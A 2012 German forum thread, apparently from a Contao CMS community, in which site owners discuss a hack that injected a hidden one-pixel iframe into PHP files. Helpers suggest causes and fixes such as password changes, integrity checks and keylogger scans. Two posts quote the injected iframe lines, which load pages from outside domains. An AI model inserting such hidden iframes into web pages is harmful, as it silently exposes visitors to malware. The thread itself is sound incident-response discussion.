Seite gehackt?

**Korbi_et_orbi** · 01.02.2012, 11:41

Hallo, wir entwickeln gerade eine mobile Webseite.
Hoster ist 1und1. Plötzlich taucht im Code ganz oben die Zeile auf:
<iframe src=http://computek-ncl.com/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME><!DOCTYPE html>

Die Seite wird z.B. im Firefox normal geladen. Am iPhone rutscht
die Seite jedoch nach unten und oben läd der 404-IFrame. Im Log findet sich
folgende Fehlermeldung:

Details: No active page for page ID...
Browser: Mozilla/5.0 (iPhone; CPU iPhone OS 5_0_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A405 Safari/7534.48.3

Jemand eine Idee?
Vielen Dank

**Thomas** · 01.02.2012, 11:49

Ich würde das mal in den Logs kontrollieren!
Normal ist das definitiv nicht.

**Korbi_et_orbi** · 01.02.2012, 12:56

Danke. Firebug zeigt mir, wenn ich den Quelltext ausgeben will, zwei Frames an.

1. Den normalen Link
2. Das iFrame http://computek-ncl.com/stata.html

Ich denke also nicht, dass das CMS gehackt wurde.
Was denkt ihr?

**Korbi_et_orbi** · 01.02.2012, 13:27

okay, ich habe den fehler gefunden.
in der index.php war ganz oben die iframe-zeile eingefügt. how comes?
ich hab sie jetzt einfach rausgelöscht. was kann das sein, was würdet
ihr empfehlen?

***Nina*** · 01.02.2012, 13:47

Frag erstmal bei 1&1 nach, ob die da eventuell bei deinem Tarif automatisch Banner o.ä. einblenden bzw. ob ihnen der Code etwas sagt. Wenn nicht, dann bitte sie darum, dass die Techniker nachschauen ob sie sehen können wie/wann der Code da reinkam.

Welche Contao-Version nutzt du?

**Korbi_et_orbi** · 01.02.2012, 14:35

Version ist 2.10.3

Ich habe gerade mit 1und1 telefoniert.
Der Mitarbeit hat mir gesagt, dass die Dateien
"cron.php" und "share.php" am 30.1 um 3:19 angepackt wurden.
Ist dahin gehend irgendwas bekannt?
Wie soll ich weiter verfahren?

edit: auch bei den beiden dateien war die iframe-zeile eingefügt.
hab sie entfernt

**Russe** · 01.02.2012, 15:16

Das sieht dann schon danach aus dass da jemand Zugriff auf eure Dateien hat, dann heißt es alles überprüfen ob noch andere Dateien geändert wurden, für alle Zugänge die in Frage kommen die Passwörter ändern (Contao, FTP, Hosting etc.).

**lindesbs** · 01.02.2012, 15:18

Backup machen, ContaoCheck und evt. neu aufsetzen.

***Nina*** · 01.02.2012, 15:27

Zitat von Korbi_et_orbi

Version ist 2.10.3

Ich habe gerade mit 1und1 telefoniert.
Der Mitarbeit hat mir gesagt, dass die Dateien
"cron.php" und "share.php" am 30.1 um 3:19 angepackt wurden.
Ist dahin gehend irgendwas bekannt?
Wie soll ich weiter verfahren?

Ich vermute mal, dass an diesem Tag um diese Zeit alle PCs auf denen die Zugangsdaten existieren ausgeschaltet waren? Hat der Mitarbeiter von 1&1 auch gesagt von welcher IP aus das geschah? Immerhin handelt es sich hier offensichtlich um einen Hack - da müssten die doch daran interessiert sein, herauszufinden wie das passiert ist und wer es war. Wenn das also erst vor so kurzer Zeit passierte, kann man ja im ersten Schritt anhand der IP vielleicht herausfinden aus welchem Land die Person X kam. Im zweiten Schritt könnte man in Abstimmung mit 1&1 Anzeige erstatten. Dafür müsste aber 1&1 die entsprechenden Logdaten und etwaige sonst notwendige Daten sichern.

Welches FTP-Programm nutzt du denn und welche Version davon?
Hast du den PC über den die Seite normalerweise gepflegt wird schon komplett auf Viren, Keylogger, etc. gecheckt?

**Korbi_et_orbi** · 01.02.2012, 15:51

1und1 geht von einer sicherheitslücke bei contao aus. ich arbeite mit filezilla und osx. kann mir nicht vorstellen, dass der angriff hiervon ausging. werd nochmal nachhaken.

***Nina*** · 01.02.2012, 15:57

Der Webhoster geht immer davon aus, dass es jemand anders war. Man zeigt ja ungern mit dem Finger auf die eigene Technik. Aber davon unabhängig geht es ja auch darum nicht nur das "wie" herauszufinden, sondern im Idealfall das "wer". Daher meine IP-Frage.

Falls das insgesamt falsch rüber gekommen sein sollte: Wir nehmen deine Meldung absolut ernst und schauen natürlich auch ob wir ein mögliches Problem bei Contao finden.

Momentan wäre da aber nichts bekannt für diese Version.

Kannst du bitte noch sagen welche Erweiterungen (Versionen) in deiner Contao-Installation installiert sind?

**lindesbs** · 01.02.2012, 15:59

und bitte mit dem ContaoCheck kontrollieren, was alles veraendert wurde : http://www.contao.org/de/configuring...l#contao-check
Die richtige Verison raussuchen, und testen.

**markocupic** · 01.02.2012, 17:24

ist mir auch schon passiert. Bei mir lag es am zu schwachen ftp-Passwort.
Passwort ersetzen und Problem war behoben.
Gruss Marko

**Thomas** · 01.02.2012, 17:36

Damit machst Du Dir das dennoch zu einfach!

Was ist, wenn das bei ihm nicht der Fall ist?

Sorry, aber da kann ich dann doch nur den Kopf schütteln.

Wenn ich Nachforschungen betreibe, dann richtig.
Und die Aussage, dass das von Contao kommt, sollen die erst mal an Fakten beweisen.
Dazu gehört nun mal Recherche und nicht nur ein 1. Level Support, der nur telefonieren kann. ^^
Bei dieser Antwort von 1und1 geht mir die Hutkrempe mal wieder hoch und spiegelt die einhellige Meinung über den Support und die Behandlung von Kunden wieder.

Nachforschungen anstellen, Fehler beheben, Lücken schließen, anderen Server oder Webspace mieten, Seite umziehen und zu guter Letzt 1und1 kündigen.
Ich finde das eine Frechheit.

Vorschläge für gute Firmen gibt es hier im Forum zu genüge.

**Korbi_et_orbi** · 02.02.2012, 13:34

erstmal vielen dank für eure antworten.
das wichtigste: der iframe taucht auch an tag 2 nicht mehr auf.
ich stell mir nach wie vor die sinnfrage. warum bettet jemand
sowas ein? wollen sie traffic auf ihre seite kriegen?

passwörter ändern ist natürlich die wichtigste sofortmaßnahme.

ich werde beide seiten- contao und 1und1 -noch einmal kontaktieren
und mit den wichtigsten infos versorgen, damit eine vielleicht bestehende
lücke geschlossen werden kann.

**lindesbs** · 02.02.2012, 13:39

Hast du denn mittlerweile mal den ContaoCheck gemacht ?
Damit du wirklich sicherstellen kannst, das am Core nicht noch was angepasst wurde ?

Und warum macht man sowas ?
Weil durch einfach eratbare FTP Passwoerter eben Spielkinder sich beschaeftigen koennen.

Auf meinem Server werden solche Speilkinder nach wenigen Versuchen geblockt, und ich ahb etliche am Tag, die Passowerter durchprobieren.

**Korbi_et_orbi** · 02.02.2012, 14:13

hab den check gerade gemacht.
es gibt seitenweise fehlermeldungen.
ich hab einen auszug davon mal angehängt:
Bildschirmfoto 2012-02-02 um 15.11.08.png

auf was muss ich genau achten?

**AgentK** · 02.02.2012, 15:23

Hallo,

das IFrame Problem kenne ich auch von einer Contao 2.9x Installtion. Vor Kurzem wurde dort folgendes IFrame eingeschmuggelt:

<iframe src=http://marcodenicolais.it/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>

Betroffen sind sowohl die Frontend-Seiten (die aber noch richtig geladen werden), als auch das Backend. Das Backend lässt kein Login mehr zu, da nur das IFrame aber nicht mehr die Login-Maske geladen wird.

Der Hoster ist All-Inkl. Es ist also nicht von einem Hoster abhängig.

Die Passwörter waren verschieden und bestanden aus gemischten Buchstaben/Zahlenkombinationen, ein Ratespiel der Passwörter kommt daher eigentlich nicht in Frage.

Gruß

Stefan

Ergänzung:

Das Backend war bei dieser Installtion nicht mit einem Verzeichnisschutz versehen!

**schman** · 02.02.2012, 16:24

Zitat von AgentK

Die Passwörter waren verschieden und bestanden aus gemischten Buchstaben/Zahlenkombinationen, ein Ratespiel der Passwörter kommt daher eigentlich nicht in Frage.

Dann kommt immer noch ein Keylogger in Frage.

**AgentK** · 02.02.2012, 16:42

hmmm.... das kann ich jetzt nicht ausschließen aber es betrifft nur einen Account. In anderen Accounts wurden keine Veränderungen vorgenommen.

**andreasisaak** · 02.02.2012, 19:01

Das im Frontend über Contao iFrames eingeschmuggelt werden können ist denkbar. Aber im Backend?? Nein Leute, das kann kein Contao Problem sein, das CMS ist gekapselt. Da muss sich jemand Zugang zu den Webhosting Daten verschafft haben!

**Korbi_et_orbi** · 02.02.2012, 19:52

bei mir war nur das Frontend betroffen.

**marvinone** · 03.02.2012, 13:24

Hi,

mir ist eine ähnliche Situation auch untergekommen, allerdings nicht mit Contao.

Bei mir war es ein Bot der sich über einen SSH-Account (mit richtigen Zugangsdaten) eingeloggt hat und die Dateien manipuliert hat. Dieser Bot hat in regelmäßigen Abständen die Dateien überprüft und ggf. die Frames neu hinzugefügt. Die Zugriffe kamen alle von der selben IP, sodass man das leicht in den Logs nachvollziehen konnte.
Nachdem das Passwort geändert wurde, hat der Bot immer wieder versucht sich einzuloggen, bis ich ihn ausgesperrt hab

. Danach hatte ich keine Probleme mehr.

Interessant war auch das die IP des Bots in einer Blacklist für Botnetze gelistet war.

Mein Tipp:

Passwort ändern
IP des Zugriffs rausfinden & Googlen
Zugriffe überwachen und ggf. IP blocken

**marvinone** · 03.02.2012, 13:29

Zitat von schman

Dann kommt immer noch ein Keylogger in Frage.

Interessant in dem Zusammenhang ist auch wo und wie die Passwörter gespeichert werden.

mfg

**Gausi** · 03.02.2012, 13:48

Wenn Filezilla benutzt wird, könnte es auch sein, dass die Zugangsdaten von einem Trojaner aus dem Configfile ausgelesen wurden. Die stehen da nämlich im Klartext drin.

Zu dem Sinn hinter solchen Aktionen: Ist das einfach nur ein iFrame mit harmlosen html-Code, oder steckt da noch ein bösartiges Script drin? Wenn deine Seite dann anfängt, Ransomware wie den BKA-Trojaner zu verteilen, um Lösegeld zu erpressen, dann hast du den Zweck der Aktion.

**Nils Riel** · 03.02.2012, 13:59

Das gleiche Problem hatte ich auch schon bei einem Kunden. Hintergrund: Eine Sicherheitslücke in Filezilla. Jeder der Zugriff auf den FTP hatte muss nun auf jeden Fall Filezilla updaten und das Passwort eines jeden gespeicherten FTP-Servers ändern.

**andreasisaak** · 03.02.2012, 20:06

Wieso verwendet man überhaupt ein FTP-Programm? Und dann auch noch eins was die PW's als Klartext abspeichert?

**rednex** · 03.02.2012, 20:31

Zitat von andreasisaak

Wieso verwendet man überhaupt ein FTP-Programm? Und dann auch noch eins was die PW's als Klartext abspeichert?

Deine Alternative zum FTP-Programm wäre genau welche?

**andreasisaak** · 03.02.2012, 20:51

Ein (S)FTP/SSH fähiges Programm - WinSCP.

**Psi** · 03.02.2012, 21:07

rsync ftw

**rednex** · 03.02.2012, 21:34

Zitat von andreasisaak

Ein (S)FTP/SSH fähiges Programm - WinSCP.

Kann Filezilla doch

**Max Kittel** · 03.02.2012, 22:29

Hatte das gleiche Problem. Den Zugang haben sich die Burschen über den Admin-Ordner einer OS Commerce Installation auf die Root Ebene des Servers verschafft. Es wurden an alle (ca. 11000) Dateien (.html und .php) ein Javascript angehängt das dann in einen i-frame eine Domain öffnete. Diese wiederum verwies auf die nächste Domain usw. Es ging über Holland bis in die Ukraine. Ziel war es Schadsoftware auf den Rechner des Besuchers zu laden. Erkennen konnte man den Hack unter Anderem an einen leicht veränderten Seitentitel. Der Hoster war 1und1. Im Server Protokoll konnte der Zeitpunkt des Angriffs bestimmt werden und die Bitte, alle Dateien aus dem täglichen Update neu aufzuspielen wurde innerhalb 2 Stunden erfüllt.
Gruß Max

Thema: Seite gehackt?

Themen-Optionen

Thema durchsuchen

Seite gehackt?

Bot?

Aktive Benutzer

Aktive Benutzer

Lesezeichen

Lesezeichen

Berechtigungen

Contao

Empfohlene Webdesign-Bücher